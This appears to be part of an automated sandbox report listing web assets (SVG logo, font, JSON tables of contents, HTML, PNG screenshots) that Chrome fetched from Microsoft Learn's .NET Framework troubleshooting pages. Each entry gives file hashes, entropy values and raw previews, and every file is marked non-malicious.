                                                                                                                                                                          Preview:<svg width="456" height="456" viewBox="0 0 456 456" fill="none" xmlns="http://www.w3.org/2000/svg">..<rect width="456" height="456" fill="#512BD4"/>..<path d="M81.2738 291.333C78.0496 291.333 75.309 290.259 73.052 288.11C70.795 285.906 69.6665 283.289 69.6665 280.259C69.6665 277.173 70.795 274.529 73.052 272.325C75.309 270.121 78.0496 269.019 81.2738 269.019C84.5518 269.019 87.3193 270.121 89.5763 272.325C91.887 274.529 93.0424 277.173 93.0424 280.259C93.0424 283.289 91.887 285.906 89.5763 288.11C87.3193 290.259 84.5518 291.333 81.2738 291.333Z" fill="white"/>..<path d="M210.167 289.515H189.209L133.994 202.406C132.597 200.202 131.441 197.915 130.528 195.546H130.044C130.474 198.081 130.689 203.508 130.689 211.827V289.515H112.149V171H134.477L187.839 256.043C190.096 259.57 191.547 261.994 192.192 263.316H192.514C191.977 260.176 191.708 254.859 191.708 247.365V171H210.167V289.515Z" fill="white"/>..<path d="M300.449 289.515H235.561V171H297.87V187.695H254.746V221.249H294.485V237.861H254.746V
                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                          File Type:Web Open Font Format (Version 2), TrueType, length 19696, version 1.0
                                                                                                                                                                          Category:downloaded
                                                                                                                                                                          Size (bytes):19696
                                                                                                                                                                          Entropy (8bit):7.9898910353479335
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:384:37wfQhsuDSP36Elj0oScS8w3F1ZTt5JwtRGsh1SJR3YL0BeojRs8E:37Cms69owH3FPutReFYL+eods8E
                                                                                                                                                                          MD5:4D0BFEA9EBDA0657CEE433600ED087B6
                                                                                                                                                                          SHA1:F13C690B170D5BA6BE45DEDC576776CA79718D98
                                                                                                                                                                          SHA-256:67E7D8E61B9984289B6F3F476BBEB6CEB955BEC823243263CF1EE57D7DB7AE9A
                                                                                                                                                                          SHA-512:9136ADEC32F1D29A72A486B4604309AA8F9611663FA1E8D49079B67260B2B09CEFDC3852CF5C08CA9F5D8EA718A16DBD8D8120AC3164B0D1519D8EF8A19E4EA5
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          URL:https://learn.microsoft.com/static/assets/0.4.028726178/styles/docons.a1ef6ef.34a85e0c.woff2
                                                                                                                                                                          Preview:wOF2......L........`..L..........................T.V..@........6.$........ ..y.......d^..Awp(......<.1..fE.......I......z-.*."YTZ.p.eMd.#..7.qY..Z.!..V...!......r...Z.;b........J....X..;.^...>UQ%U..CkT.....zKG.!\8%..>.b.4o4.t*..........3..C..?u....E.S$.:.....mfZ......... .Q...].y.*.@....m.tC.C6. ......37..,V...F.a...A.. .PQ".A...B...p...q..!QA.N..m.......(..........gv..L...5M&._..+@.U..k.....CU..@...._.9q{....B..C.dB.F.a......J_Jo..M..oR....m......r...U0...y!.@-.h7...z....e.....J+...-{.s..1...^...zM[~....Fy.';.V..*.=.%......"..H..w.9L..$.{d.j&..... K...P`.$.g....;.0..........T.v....j.0Ht..<. ...<\......Ol.|_U.+rmW..JK..".e<C ...q.?...B..l..Ni.....H....D..n@.......=c.f3.7........t...Z...}{....S;..KU.Ho.`....._?m....y...32l^.(..r..........Z...{U....W(......|.q..P.`,.YQ....-,c...g*F..=....."M.......sq....-....w(.e.K........^2e.3&.|,..4.TO..D].........W..W%j.._...nS.X.gE..3;2..:...Y..4j.-....c0A...U...p......d.M..6.L..b....O:[['wN.|49.......]
                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                          File Type:ASCII text, with very long lines (33148), with no line terminators
                                                                                                                                                                          Category:downloaded
                                                                                                                                                                          Size (bytes):33148
                                                                                                                                                                          Entropy (8bit):4.917595394577667
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:384:FnvJOb4OLIch+KCnMet7NPXlJl+HjZjBTRdE0zIwHdZ4vNNpUjV8din4E9hLUuro:5hOEO8chkMet7pCjBfcHkWOzUuro
                                                                                                                                                                          MD5:C4DE3932AA578FA03847604F09660315
                                                                                                                                                                          SHA1:5EFBA9D7F437AF4786560559FBF162C4475AAD4F
                                                                                                                                                                          SHA-256:7683C2566CBF3C67F1A645891CC7B4DE7D143FE40E0271E106AB55E90EF9C5A8
                                                                                                                                                                          SHA-512:3DCA7F8C7C2997D473B2B80916F3E976167BA06300E915CB301DB2A024A826B9E8D3A60B6111835A5FB9A3273B4080D89351F664F9CC410C18B7F76327C326AE
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          URL:https://learn.microsoft.com/en-us/dotnet/framework/toc.json
                                                                                                                                                                          Preview:{"items":[{"href":"./","toc_title":".NET Framework documentation"},{"href":"get-started/overview","toc_title":"Overview of .NET Framework"},{"children":[{"href":"get-started/","toc_title":"Overview"},{"href":"get-started/out-of-band-releases","toc_title":"Out-of-band releases"},{"href":"get-started/system-requirements","toc_title":"System requirements"}],"toc_title":"Get started"},{"children":[{"href":"install/","toc_title":"Overview"},{"href":"install/guide-for-developers","toc_title":"For developers"},{"children":[{"href":"install/on-windows-11","toc_title":"Windows 11"},{"href":"install/on-windows-10","toc_title":"Windows 10 and Windows Server 2016"},{"href":"install/on-windows-8-1","toc_title":"Windows 8.1 and Windows Server 2012 R2"},{"href":"install/on-windows-8","toc_title":"Windows 8 and Windows Server 2012"},{"href":"install/on-server-2022","toc_title":"Windows Server 2022"},{"href":"install/on-server-2019","toc_title":"Windows Server 2019"}],"toc_title":"By OS version"},{"hre
                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                          File Type:PNG image data, 475 x 212, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):35005
                                                                                                                                                                          Entropy (8bit):7.980061050467981
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:768:aHBEr/QXnbCgWotMq4AZZivq2/Qu0cEv1FjHBep6U0Z/68R:ahWqbTWiM7ACvdIdldhep4rR
                                                                                                                                                                          MD5:522037F008E03C9448AE0AAAF09E93CB
                                                                                                                                                                          SHA1:8A32997EAB79246BEED5A37DB0C92FBFB006BEF2
                                                                                                                                                                          SHA-256:983C35607C4FB0B529CA732BE42115D3FCAAC947CEE9C9632F7CACDBDECAF5A7
                                                                                                                                                                          SHA-512:643EC613B2E7BDBB2F61E1799C189B0E3392EA5AE10845EB0B1F1542A03569E886F4B54D5B38AF10E78DB49C71357108C94589474B181F6A4573B86CF2D6F0D8
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:.PNG........IHDR..............[.U....sRGB.........gAMA......a.....pHYs..........+.....RIDATx^..`........B hpwww(PJ....R.B.....K[j....@ H ..r:...].P._.`...K.ffg.v.ygf.TM.4.m...`.D".H$......"##..2e.X.t..Y".H$...d..PK.V".H$..uVm.,.H$.....b+.H$.I-#.V".H$.ZF..D".H$...[.D".Hj.)...D"..2Rl%..D".e..J$..DR.H..H$.....b+.H$..9..Neee.X,.B.\/.....o.b+.H$..9...q...EHU*....p.....=z....b.7.q..........N.. ....cUAX.9...m'_...2.`.g{...4.H.9.p.4...K ^.....`.|.n*..]..m..`W..W.H.~..|.^.a..K.6......_....K..w....9......^.....&...R....[...w..Ix=.:..^/..Epp0.5.....QRR...l....S.b.5.c.6...5..8.\....z...I......&.>....../.{.=...]'c......[.E`@Cg......Z.....c.f..,.y|,.{.o@.j..2..:.&l4.{.]Ll.N.0..b:b...g.n.........I...Ewc....[..,i`v......F...il|.c,{.-.....%BP.U........y.x....6..E2..n.W...J .*..`..r....F....#BCC......|.L&........O...'........\.....;...q.n$...7...ga..x....)..A...0.{1..'1../...+yRC...W.-..b..c0dDG...U[po....2eG.G.../.@........h.:.k?.......Q...
                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                          File Type:PNG image data, 658 x 480, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):13842
                                                                                                                                                                          Entropy (8bit):7.802399161550213
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:192:NLNf+jBQsDHg7av3EEondO8PuRu2mIYXEIiDm42NpsHFMHfgnJ4K2DVwv:NLt+1jDmY+ndXwjLUpiDwpzfwoDVk
                                                                                                                                                                          MD5:F6EC97C43480D41695065AD55A97B382
                                                                                                                                                                          SHA1:D9C3D0895A5ED1A3951B8774B519B8217F0A54C5
                                                                                                                                                                          SHA-256:07A599FAB1E66BABC430E5FED3029F25FF3F4EA2DD0EC8968FFBA71EF1872F68
                                                                                                                                                                          SHA-512:22462763178409D60609761A2AF734F97B35B9A818EC1FD9046AFAB489AAD83CE34896EE8586EFE402EA7739ECF088BC2DB5C1C8E4FB39E6A0FC5B3ADC6B4A9B
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:.PNG........IHDR................1....sRGB.........gAMA......a.....pHYs..........o.d..5.IDATx^..[.,.]...../<.!.B(/y..).F\r...!(.H..a ..B.~..A..KXA.M...6..8...!1....l./.X.1....2.`.y"l..R...V.....{...}._gWW.Z.VUw.N...U..P@..... ..@.A...".$..E.I.........$..("H..PD..... ..p....U.}.{.....l..A.....A........s.......D.0...@....E..x........L. /.".A.....$...Y."...%.I..["../.&.I..[`.0..IA.........p4.I.........$..("H..PD..... ..@.A...".$..E.I.........$..("H..PD..... ..@.A...".$..E.>H...O.................?.~.......].7.....a?....(H....m.G..G..a.P..?yo......f?...o. .B.....mo{[....:9<].....7.....a.....S..Cd.5,.R....#....>......._g.....Wo|.....z.g.........w.T...]x.>.....y(.........6....[..px...U....~.~hu...}H.......~.L... ....r...iY.$..Id..Ax"../....._..U....OTo|.Mh.km..A.k..k....n.C`|._\=...o...a.e.. ...&.A2..k.. ....X.+...C..P....y..>.{._..(H....8(.?...w.}M.........:s_!.m.........BY..T..z.5{.W.~..6.....F....bq....m.....?.......v....o..o...ki...iX.$......\]V...V...
                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):4897
                                                                                                                                                                          Entropy (8bit):4.8007377074457604
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:96:A0AIvEQ+KfZcbhaW9dp45qtAdflfDOFnymoLByzfwqrLvJ4QG63JkRJ+dRp8TJHr:dgQ+KfZcbhaWjp45qtAdflfDOFnNgByQ
                                                                                                                                                                          MD5:0E78F790402498FA57E649052DA01218
                                                                                                                                                                          SHA1:9ED4D0846DA5D66D44EE831920B141BBF60A0200
                                                                                                                                                                          SHA-256:73F3061A46EA8FD11D674FB21FEEEFE3753FC3A3ED77224E7F66A964C0420603
                                                                                                                                                                          SHA-512:B46E4B90E53C7DABC7208A6FDAE53F25BD70FCFBBEF03FFC64B1B5D1EB1C01C870A7309DF167246FCCD114B483038A64D7C46CA3B9FCB3779A77E42DB6967051
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:{"callToAction":{"primary":{"biName":"download-dotnet","href":"https://dotnet.microsoft.com/download","kind":"link","title":"Download .NET"}},"category":{"biName":"dotnet","href":"/dotnet/","kind":"link","title":".NET"},"items":[{"biName":"1-languages","items":[{"biName":"1-c-sharp","href":"/dotnet/csharp/","kind":"link","title":"C#"},{"biName":"2-f-sharp","href":"/dotnet/fsharp/","kind":"link","title":"F#"},{"biName":"3-visual-basic","href":"/dotnet/visual-basic/","kind":"link","title":"Visual Basic"}],"kind":"menu","title":"Languages"},{"biName":"2-features","items":[{"biName":"1-fundamental","href":"/dotnet/fundamentals/","kind":"link","title":"Fundamentals"},{"biName":"2-tools-and-diagnostics","href":"/dotnet/navigate/tools-diagnostics/","kind":"link","title":"Tools and diagnostics"},{"biName":"3-ai","items":[{"biName":"1-generative-ai","href":"/dotnet/ai/","kind":"link","title":"Generative AI"},{"biName":"2-mlnet","href":"/dotnet/machine-learning/","kind":"link","title":"ML.NET"}]
                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                          File Type:HTML document, ASCII text, with very long lines (639), with CRLF, LF line terminators
                                                                                                                                                                          Category:downloaded
                                                                                                                                                                          Size (bytes):47062
                                                                                                                                                                          Entropy (8bit):5.016115705165622
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:768:haAE16LIElO6L6x2bTI1ln4a1T0MCFnFMBVeZrdLg:hTAGLlO6eAbTIr4audZqBkZRLg
                                                                                                                                                                          MD5:B7BA0F1B4D3EE09BD4C1DD5EE8FA2633
                                                                                                                                                                          SHA1:A5725E0BD2E4DE3EB07E9C468306615CD0CE6955
                                                                                                                                                                          SHA-256:411BCF8F95DAF3C6D0BEBDFA4DDEFD0F947D2083C1A27BDD0E5D19BB6F299838
                                                                                                                                                                          SHA-512:59F535B445302E8A8398F02F7729D16236C629EB0967833257F8BA391A4E93B3A23A5FA3D64127EC117B8D93A6D7A9B86EBCB4B6E6F96CFF3B4DB3EE3C5F4844
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          URL:https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
                                                                                                                                                                          Preview:<!DOCTYPE html><html..class="hasSidebar hasPageActions hasBreadcrumb conceptual has-default-focus theme-light"..lang="en-us"..dir="ltr"..data-authenticated="false"..data-auth-status-determined="false"..data-target="docs"..x-ms-format-detection="none">..<head>..<meta charset="utf-8" />..<meta name="viewport" content="width=device-width, initial-scale=1.0" />..<meta property="og:title" content="Fix .NET Framework 'This application could not be started' - .NET Framework" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started" /><meta property="og:description" content="Learn what to do if you see a 'This application could not be started' dialog box when running a .NET Framework application." /><meta property="og:image" content="https://learn.microsoft.com/dotnet/media/dotnet-logo.png" />...<meta property="og:image:alt" content="Fix .NET Framework 'This application could not be st
                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                          Category:downloaded
                                                                                                                                                                          Size (bytes):3130
                                                                                                                                                                          Entropy (8bit):4.790069981348324
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:48:YWuGl640ynAqgDJ9OJWuO6Z3Db8VgK/ni47ttbtlSlA37ERw7II77Aj5M1:Nv0ynAhD3CO5t5lNEYIOEjc
                                                                                                                                                                          MD5:EBA6E81304F2F555E1D2EA3126A18A41
                                                                                                                                                                          SHA1:61429C3FE837FD4DD68E7B26678F131F2E00070D
                                                                                                                                                                          SHA-256:F309CCCE17B2B4706E7110F6C76F81761F0A44168D12C358AC4D120776907F81
                                                                                                                                                                          SHA-512:3BE0466794E7BDDC8565758DBF5553E89ED0003271F07695F09283F242BB65C1978ED79A38D5E589A99F68C0130E1E4B52576D7CD655EE272EE104BE0378E72E
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          URL:https://learn.microsoft.com/en-us/dotnet/breadcrumb/toc.json
                                                                                                                                                                          Preview:{"items":[{"children":[{"children":[{"homepage":"/dotnet/api/index","href":"/dotnet/api/","toc_title":"API browser"},{"homepage":"/dotnet/csharp/index","href":"/dotnet/csharp/","toc_title":"C#"},{"homepage":"/dotnet/fsharp/index","href":"/dotnet/fsharp/","toc_title":"F#"},{"homepage":"/dotnet/visual-basic/index","href":"/dotnet/visual-basic/","toc_title":"Visual Basic"},{"homepage":"/dotnet/ai/index","href":"/dotnet/ai/","toc_title":"AI"},{"homepage":"/dotnet/azure/index","href":"/dotnet/azure/","toc_title":"Azure"},{"homepage":"/dotnet/aspire/index","href":"/dotnet/aspire/","toc_title":".NET Aspire"},{"homepage":"/dotnet/orleans/index","href":"/dotnet/orleans/","toc_title":"Orleans"},{"children":[{"homepage":"/dotnet/framework/unmanaged-api/","href":"/dotnet/framework/unmanaged-api/","toc_title":"Unmanaged API reference"}],"homepage":"/dotnet/framework/index","href":"/dotnet/framework/","toc_title":".NET Framework"},{"children":[{"homepage":"/dotnet/architecture/modern-web-apps-azure/
                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                          File Type:PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):18367
                                                                                                                                                                          Entropy (8bit):7.7772261735974215
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:384:4qqZYz7CAda2Qmd6VWWNg9h8XvdkRbdi2nki:1qZYz7Cma2hYNMh8XvdObdi2nX
                                                                                                                                                                          MD5:240C4CC15D9FD65405BB642AB81BE615
                                                                                                                                                                          SHA1:5A66783FE5DD932082F40811AE0769526874BFD3
                                                                                                                                                                          SHA-256:030272CE6BA1BECA700EC83FDED9DBDC89296FBDE0633A7F5943EF5831876C07
                                                                                                                                                                          SHA-512:267FE31BC25944DD7B6071C2C2C271CCC188AE1F6A0D7E587DCF9198B81598DA6B058D1B413F228DF0CB37C8304329E808089388359651E81B5F3DEC566D0EE0
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:.PNG........IHDR.............,#......sRGB.........gAMA......a.....pHYs..........o.d..GTIDATx^._.}.U.7..BkB.......!E......b.Ej.K...Z...iK.$..h..B`..T.?5.7.I..16$.E.......c...c...Q_V.k...k..g.y.9..G.g..g.9.Z{..Z{.nv....@......P.D....T.Q....U@T...@......P.D....T.Q....U@T...<@v.].../.1R'm.....x..h.....]a1U7........s.......x.h.q.A! *....8IL\GP..............M...W.............D.....dJ<.+,.........W...pgAT...@......P.D....T.Q....U@T...@......P.D....T.Q....U@T...@......P.D....T.Q....U@T...@......P.;/*..G....O~..O~...'?......h.....}.y..4/....S..........Y......?..?.g7...G...............x{..w..y.~.9.~.y....y.#.c....<.E.............^..7G.._.u.nv/..f........5.....5?.;...w.....i~.?|..H+*Dd.....Y%*....r~.$Q...7.v..._hv..r.O_.4..7M.6....o..=..?....3....?.....xE...O..7....^......D.W....m...6........O..Ob.4.9J........6.;..>.,.....o.l..>%J.V......%k..0.bQqIA..O..y.{.....7.......4_..Za...4.o.....h..........k...M...i....G.4...h.L.#...&.'%...~j..W.*Kx......o.%s.m
                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                          File Type:PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):13339
                                                                                                                                                                          Entropy (8bit):7.683569563478597
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:192:zjSKAj04ndWb6OuzZjk6TsEaJS0/bJur2Gz4Imm3MhE4NfM:zutfW69XTspsG3G0TfhEQM
                                                                                                                                                                          MD5:512625CF8F40021445D74253DC7C28C0
                                                                                                                                                                          SHA1:F6B27CE0F7D4E48E34FDDCA8A96337F07CFFE730
                                                                                                                                                                          SHA-256:1D4DCEE8511D5371FEC911660D6049782E12901C662B409A5C675772E9B87369
                                                                                                                                                                          SHA-512:AE02319D03884D758A86C286B6F593BDFFD067885D56D82EEB8215FDCB41637C7BB9109039E7FBC93AD246D030C368FB285B3161976ED485ABC5A8DF6DF9A38C
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:.PNG........IHDR.............,#......sRGB.........gAMA......a.....pHYs..........o.d..3.IDATx^..].5Y...C.$..tH .NF.I&A0..;.r.fF.#..!7...'..3.0.../..s....."!.y...~....4....om.g.3.BTP......j..g.zVU....u...a.Z..j..U....y......$.....I...pAR...\.T....$.....I...pAR...\.T..p....5O>.d...}Rg.$....@.4....fb1.o.I...7..<.P.....n0.D.P.....n..L.P.....n8.......P.~......n(+..'. ......J.vM,H*......W...h.T....$.....I...pAR...\.T....$.....I...pAR...\.T....$.....I...pAR...\.T....$......'....w....g....|../5_.......T...~.y.'.'.|...W..[...C.)......|.[.[WK...w...w..y.{..|.#.n>...5....5...h>..O6O>.Xx....o.B........g?.........~....?o...w.......}..-_k^........l....|.D.TH.....o..B'..(.W-%...?...W.......E?h..........~.......?...~,..}...o^...5ox..bI.mo{[s.}.5.<.L.......<......Y.W......K..Q._...Iu...2...e)d]4.}Y..............k.%k..s.'..L(..o4...g...z*............N.X.....W.O.^.4.....7......i~._7..~,bI......3.0RRq..|.Mk..?.{.K_...t.........SYG.W^#).N^..._W...(.8.7.....W....7...m
                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                          File Type:PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                          Category:downloaded
                                                                                                                                                                          Size (bytes):18367
                                                                                                                                                                          Entropy (8bit):7.7772261735974215
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:384:4qqZYz7CAda2Qmd6VWWNg9h8XvdkRbdi2nki:1qZYz7Cma2hYNMh8XvdObdi2nX
                                                                                                                                                                          MD5:240C4CC15D9FD65405BB642AB81BE615
                                                                                                                                                                          SHA1:5A66783FE5DD932082F40811AE0769526874BFD3
                                                                                                                                                                          SHA-256:030272CE6BA1BECA700EC83FDED9DBDC89296FBDE0633A7F5943EF5831876C07
                                                                                                                                                                          SHA-512:267FE31BC25944DD7B6071C2C2C271CCC188AE1F6A0D7E587DCF9198B81598DA6B058D1B413F228DF0CB37C8304329E808089388359651E81B5F3DEC566D0EE0
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          URL:https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/repair-tool-no-resolution.png
                                                                                                                                                                          Preview:.PNG........IHDR.............,#......sRGB.........gAMA......a.....pHYs..........o.d..GTIDATx^._.}.U.7..BkB.......!E......b.Ej.K...Z...iK.$..h..B`..T.?5.7.I..16$.E.......c...c...Q_V.k...k..g.y.9..G.g..g.9.Z{..Z{.nv....@......P.D....T.Q....U@T...@......P.D....T.Q....U@T...<@v.].../.1R'm.....x..h.....]a1U7........s.......x.h.q.A! *....8IL\GP..............M...W.............D.....dJ<.+,.........W...pgAT...@......P.D....T.Q....U@T...@......P.D....T.Q....U@T...@......P.D....T.Q....U@T...@......P.;/*..G....O~..O~...'?......h.....}.y..4/....S..........Y......?..?.g7...G...............x{..w..y.~.9.~.y....y.#.c....<.E.............^..7G.._.u.nv/..f........5.....5?.;...w.....i~.?|..H+*Dd.....Y%*....r~.$Q...7.v..._hv..r.O_.4..7M.6....o..=..?....3....?.....xE...O..7....^......D.W....m...6........O..Ob.4.9J........6.;..>.,.....o.l..>%J.V......%k..0.bQqIA..O..y.{.....7.......4_..Za...4.o.....h..........k...M...i....G.4...h.L.#...&.'%...~j..W.*Kx......o.%s.m
                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                          File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):1154
                                                                                                                                                                          Entropy (8bit):4.59126408969148
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:24:txFRuJpzYeGK+VS6ckNL2091JP/UcHc8oQJ1sUWMLc/jH6GbKqjHJIOHA:JsfcU6ckNL2091Z/U/YsUDM+GhS
                                                                                                                                                                          MD5:37258A983459AE1C2E4F1E551665F388
                                                                                                                                                                          SHA1:603A4E9115E613CC827206CF792C62AEB606C941
                                                                                                                                                                          SHA-256:8E34F3807B4BF495D8954E7229681DA8D0DD101DD6DDC2AD7F90CD2983802B44
                                                                                                                                                                          SHA-512:184CB63EF510143B0AF013F506411C917D68BB63F2CFA47EA2A42688FD4F55F3B820AF94F87083C24F48AACEE6A692199E185FC5C5CFBED5D70790454EED7F5C
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:<svg width="456" height="456" viewBox="0 0 456 456" fill="none" xmlns="http://www.w3.org/2000/svg">..<rect width="456" height="456" fill="#512BD4"/>..<path d="M81.2738 291.333C78.0496 291.333 75.309 290.259 73.052 288.11C70.795 285.906 69.6665 283.289 69.6665 280.259C69.6665 277.173 70.795 274.529 73.052 272.325C75.309 270.121 78.0496 269.019 81.2738 269.019C84.5518 269.019 87.3193 270.121 89.5763 272.325C91.887 274.529 93.0424 277.173 93.0424 280.259C93.0424 283.289 91.887 285.906 89.5763 288.11C87.3193 290.259 84.5518 291.333 81.2738 291.333Z" fill="white"/>..<path d="M210.167 289.515H189.209L133.994 202.406C132.597 200.202 131.441 197.915 130.528 195.546H130.044C130.474 198.081 130.689 203.508 130.689 211.827V289.515H112.149V171H134.477L187.839 256.043C190.096 259.57 191.547 261.994 192.192 263.316H192.514C191.977 260.176 191.708 254.859 191.708 247.365V171H210.167V289.515Z" fill="white"/>..<path d="M300.449 289.515H235.561V171H297.87V187.695H254.746V221.249H294.485V237.861H254.746V
                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):3130
                                                                                                                                                                          Entropy (8bit):4.790069981348324
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:48:YWuGl640ynAqgDJ9OJWuO6Z3Db8VgK/ni47ttbtlSlA37ERw7II77Aj5M1:Nv0ynAhD3CO5t5lNEYIOEjc
                                                                                                                                                                          MD5:EBA6E81304F2F555E1D2EA3126A18A41
                                                                                                                                                                          SHA1:61429C3FE837FD4DD68E7B26678F131F2E00070D
                                                                                                                                                                          SHA-256:F309CCCE17B2B4706E7110F6C76F81761F0A44168D12C358AC4D120776907F81
                                                                                                                                                                          SHA-512:3BE0466794E7BDDC8565758DBF5553E89ED0003271F07695F09283F242BB65C1978ED79A38D5E589A99F68C0130E1E4B52576D7CD655EE272EE104BE0378E72E
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:{"items":[{"children":[{"children":[{"homepage":"/dotnet/api/index","href":"/dotnet/api/","toc_title":"API browser"},{"homepage":"/dotnet/csharp/index","href":"/dotnet/csharp/","toc_title":"C#"},{"homepage":"/dotnet/fsharp/index","href":"/dotnet/fsharp/","toc_title":"F#"},{"homepage":"/dotnet/visual-basic/index","href":"/dotnet/visual-basic/","toc_title":"Visual Basic"},{"homepage":"/dotnet/ai/index","href":"/dotnet/ai/","toc_title":"AI"},{"homepage":"/dotnet/azure/index","href":"/dotnet/azure/","toc_title":"Azure"},{"homepage":"/dotnet/aspire/index","href":"/dotnet/aspire/","toc_title":".NET Aspire"},{"homepage":"/dotnet/orleans/index","href":"/dotnet/orleans/","toc_title":"Orleans"},{"children":[{"homepage":"/dotnet/framework/unmanaged-api/","href":"/dotnet/framework/unmanaged-api/","toc_title":"Unmanaged API reference"}],"homepage":"/dotnet/framework/index","href":"/dotnet/framework/","toc_title":".NET Framework"},{"children":[{"homepage":"/dotnet/architecture/modern-web-apps-azure/
                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                          File Type:PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):15427
                                                                                                                                                                          Entropy (8bit):7.784472070227724
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:384:CKKdvwj3SJMpKKKKKKKKikCyKwqHILyPGQV4ykihKKKKKKKCm:CKKdvMMgKKKKKKKKiqB3yPVXkihKKKKI
                                                                                                                                                                          MD5:3062488F9D119C0D79448BE06ED140D8
                                                                                                                                                                          SHA1:8A148951C894FC9E968D3E46589A2E978267650E
                                                                                                                                                                          SHA-256:C47A383DE6DD60149B37DD24825D42D83CB48BE0ED094E3FC3B228D0A7BB9332
                                                                                                                                                                          SHA-512:00BBA6BCBFBF44B977129594A47F732809DCE7D4E2D22D050338E4EEA91FCC02A9B333C45EEB4C9024DF076CBDA0B46B621BF48309C0D037D19BBEAE0367F5ED
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:.PNG........IHDR.............,#......sRGB.........gAMA......a.....pHYs..........o.d..;.IDATx^..].u.Y..M....B.X...".......@.ZzSys..,H{.Rz!... .......WM.IN..9n..I....g...p<P.0*-....|...X..s...Z.Y{....w..5.._s..x...E.......... ......*............... ......*............{....2. ...`.$h.......)....,T-x.5......,.."..(.A.......>.. ...`..*....4..G.|.....,T-..'. ...`....]........?~.....A...pAP...\.T..........A...pAP...\.T..........A...pAP...\.T..........A...pAP...\.}P../}....TJ...'.O...'?......XH...K..>.b..K/t...o.......T.._.E.....q.$.x..qJ......mo...ww.}.{....W..._...._.^z...........(^x..C..P.../.........U..]../u.....w..{.O.N..o.l........_.^...2.....*....<...iP.W...o......]..+.?}c...t!.....p.=..._x..._yo....?....~u.c?.c1'.....{.^.}.S...5.yMx./.>.lwqq.}.....g..g1wZ..%......h.i[..%ul.&..U.k..";7-.9.6...s..s..0.......}.s..?...c..X...|..........>.x..o.?.?..{........n..o....]?....Ej..yuu5...A.}....5...^...f........s.qJ..SYF.V...'..q.......T..'..z.....
                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                          File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                          Category:downloaded
                                                                                                                                                                          Size (bytes):464328
                                                                                                                                                                          Entropy (8bit):5.074669864961383
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:6144:XegPryKCerH5dyUJ6Yh6BFPDxZYX04GK7M4:gKCerXyUh
                                                                                                                                                                          MD5:CB0701D474D57F8C8E2F569161CE0349
                                                                                                                                                                          SHA1:4BE2E0C148DED16354E7A91FE721644897C5503C
